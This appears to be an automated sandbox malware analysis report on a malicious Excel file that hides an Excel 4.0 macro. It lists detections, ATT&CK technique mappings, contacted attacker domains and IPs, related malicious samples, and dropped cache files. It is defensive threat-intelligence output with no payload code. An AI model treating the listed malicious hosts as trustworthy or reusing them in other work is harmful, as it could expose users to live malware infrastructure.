      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: statistic-1496367785.xls, type: SAMPLE
      Source: Yara matchFile source: statistic-1496367785.xls, type: SAMPLE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      statistic-1496367785.xls38%VirustotalBrowse
      statistic-1496367785.xls35%ReversingLabsDocument-Excel.Trojan.Woreflint

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      academy.haleemcampus.com
      108.179.232.80
      truefalse
        unknown
        psq.com.mx
        162.241.2.112
        truefalse
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpfalse
            high
            http://www.windows.com/pctv.rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comrundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpfalse
                    high
                    http://investor.msn.com/rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      108.179.232.80
                      academy.haleemcampus.comUnited States
                      46606UNIFIEDLAYER-AS-1USfalse
                      162.241.2.112
                      psq.com.mxUnited States
                      26337OIS1USfalse

                      General Information

                      Joe Sandbox Version:32.0.0 Black Diamond
                      Analysis ID:441923
                      Start date:29.06.2021
                      Start time:17:39:41
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 5m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:statistic-1496367785.xls
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal80.expl.evad.winXLS@5/13@2/2
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      Warnings:
                      Show All
                      • Max analysis timeout: 220s exceeded, the analysis took too long
                      • TCP Packets have been reduced to 100
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 91.199.212.52, 13.107.4.50, 93.184.221.240, 192.35.177.64
                      • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, afdap.au.au-msedge.net, au.au-msedge.net, crt.usertrust.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, apps.identrust.com
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      108.179.232.8033c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                        33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                          7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                            7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                              statistic-462462953.xlsGet hashmaliciousBrowse
                                statistic-462462953.xlsGet hashmaliciousBrowse
                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                    statistic-1403316517.xlsGet hashmaliciousBrowse
                                      statistic-260077031.xlsGet hashmaliciousBrowse
                                        statistic-260077031.xlsGet hashmaliciousBrowse
                                          5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                            5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                statistic-1066846651.xlsGet hashmaliciousBrowse
                                                  162.241.2.11233c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                    33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                        7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                          statistic-462462953.xlsGet hashmaliciousBrowse
                                                            statistic-462462953.xlsGet hashmaliciousBrowse
                                                              statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                    statistic-260077031.xlsGet hashmaliciousBrowse
                                                                      5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                        5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                            statistic-1066846651.xlsGet hashmaliciousBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              psq.com.mx33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-260077031.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-260077031.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              academy.haleemcampus.com33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-260077031.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-260077031.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80

                                                                              ASN

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              OIS1USPurchase Order.exeGet hashmaliciousBrowse
                                                                              • 162.241.85.212
                                                                              DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                              • 162.241.85.210
                                                                              New_PO#98202139.xllGet hashmaliciousBrowse
                                                                              • 162.241.2.66
                                                                              Payment_Swift00987.exeGet hashmaliciousBrowse
                                                                              • 162.241.2.50
                                                                              Payment_Advice.exeGet hashmaliciousBrowse
                                                                              • 162.241.2.50
                                                                              PO#8076.exeGet hashmaliciousBrowse
                                                                              • 162.241.2.239
                                                                              New_Order.xllGet hashmaliciousBrowse
                                                                              • 162.241.2.66
                                                                              PO36782110.xllGet hashmaliciousBrowse
                                                                              • 162.241.2.66
                                                                              Product_Inquiry.xllGet hashmaliciousBrowse
                                                                              • 162.241.2.66
                                                                              Request for quotation,PDF.exeGet hashmaliciousBrowse
                                                                              • 162.241.203.147
                                                                              Request for quotation,PDF.exeGet hashmaliciousBrowse
                                                                              • 162.241.203.147
                                                                              CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                              • 162.241.85.231
                                                                              Payment_Advice.exeGet hashmaliciousBrowse
                                                                              • 162.241.2.50
                                                                              ZRvY1UrHuF.xlsGet hashmaliciousBrowse
                                                                              • 162.241.203.185
                                                                              PO_no52071.exeGet hashmaliciousBrowse
                                                                              • 162.241.2.122
                                                                              33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              statistic-462462953.xlsGet hashmaliciousBrowse
                                                                              • 162.241.2.112
                                                                              UNIFIEDLAYER-AS-1US4dvYb6Nq3y.exeGet hashmaliciousBrowse
                                                                              • 50.87.238.189
                                                                              Remittance.xlsGet hashmaliciousBrowse
                                                                              • 162.241.120.180
                                                                              SecuriteInfo.com.Trojan.Win32.Save.a.27842.exeGet hashmaliciousBrowse
                                                                              • 192.185.164.148
                                                                              SEOCHANG INDUSTRY Co., Ltd..exeGet hashmaliciousBrowse
                                                                              • 162.241.24.206
                                                                              7R9igRpuL4.msiGet hashmaliciousBrowse
                                                                              • 192.185.0.218
                                                                              nxinF8KuKS.exeGet hashmaliciousBrowse
                                                                              • 192.185.16.56
                                                                              242jQP4mQP.exeGet hashmaliciousBrowse
                                                                              • 50.87.248.20
                                                                              Halkbank.exeGet hashmaliciousBrowse
                                                                              • 192.185.0.218
                                                                              HBenKsn2R8.exeGet hashmaliciousBrowse
                                                                              • 96.125.162.104
                                                                              DC Viet Nam Order list 6-25-21.exeGet hashmaliciousBrowse
                                                                              • 162.144.0.158
                                                                              Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                                                                              • 108.167.156.42
                                                                              plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                              • 50.116.92.246
                                                                              plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                              • 50.116.92.246
                                                                              factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                                              • 74.220.199.6
                                                                              T5gtQGRL8u.exeGet hashmaliciousBrowse
                                                                              • 162.241.135.156
                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.114.107
                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.114.107
                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                              • 162.241.114.107
                                                                              plan-930205822.xlsbGet hashmaliciousBrowse
                                                                              • 50.116.92.246
                                                                              7UXBXIr31E.exeGet hashmaliciousBrowse
                                                                              • 192.185.198.10

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              7dcce5b76c8b17472d024758970a406bNew Purchase Order Air Shipment,pdf.ppsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Scan8378 CTIMAIL3.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              BNK1135000001.docxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Wilson-McShane Corporation ACH.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              PO20210628.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              PO 33015.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18008.rtfGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Wilson-McShane Corporation ACH.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              PO20210624.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              order-0798.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              dridexxx.xlsbGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              vessel arrival notice.docxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              sf0X1hMF0g.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              sf0X1hMF0g.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Wilson-McShane Corporation ACH.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Bulk Order-0798.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              PO20210624.xlsxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Quote Requirment R2106131401 .docxGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              h2GeNTLcFz.xlsGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112
                                                                              Purchase Order.docGet hashmaliciousBrowse
                                                                              • 108.179.232.80
                                                                              • 162.241.2.112

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):61020
                                                                              Entropy (8bit):7.994886945086499
                                                                              Encrypted:true
                                                                              SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                              MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                              SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                              SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                              SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1413
                                                                              Entropy (8bit):7.480496427934893
                                                                              Encrypted:false
                                                                              SSDEEP:24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
                                                                              MD5:285EC909C4AB0D2D57F5086B225799AA
                                                                              SHA1:D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
                                                                              SHA-256:68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
                                                                              SHA-512:4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: 0...0..i.......9rD:.".Q..l..15.0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0...*.H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):893
                                                                              Entropy (8bit):7.366016576663508
                                                                              Encrypted:false
                                                                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):326
                                                                              Entropy (8bit):3.1368898392817663
                                                                              Encrypted:false
                                                                              SSDEEP:6:kKBMc3CdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:q5kPlE99SNxAhUe0et
                                                                              MD5:5887C271965F719C89333C6163140C6D
                                                                              SHA1:CCC64032064157F9FFB5E4029658F2E54DBBE718
                                                                              SHA-256:41837F6E53AA0BFA346A01BC4097C81ADFB00AEE7C9980E2AFCEEDD875EA0C3E
                                                                              SHA-512:73F63D09327D62C58E80ECB52730FEE802D638DB419C5B0AC372ED55511C637CA00E597500E11E73A5131D1DF5BD6FD34DDAA681FD3DE3656D17A6DE4D05F064
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... .........k.Hm..(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):250
                                                                              Entropy (8bit):2.969287375524799
                                                                              Encrypted:false
                                                                              SSDEEP:3:kkFklNlutI9l1fllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9lm:kKfIHUQAbjMulgokaWbLOW+n
                                                                              MD5:22E86CEB0C5CC0960981167FFA58E3FD
                                                                              SHA1:6AACE3A60A040C637E47DE3693BE9238DCF03A60
                                                                              SHA-256:F8E8C226C714E1209B320FDD083890D545C0917173287C8CF4B653DA4BA0E3A2
                                                                              SHA-512:573813E03478AFBBB56B3BDA9E4324008953984262FC9D9B21AAEE41DEF08E4DC28F132DE592BB40E4790D6EA2982A62419A2B8918C65B9D1BE49694CC82926F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: p...... ....h.......Hm..(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...
                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
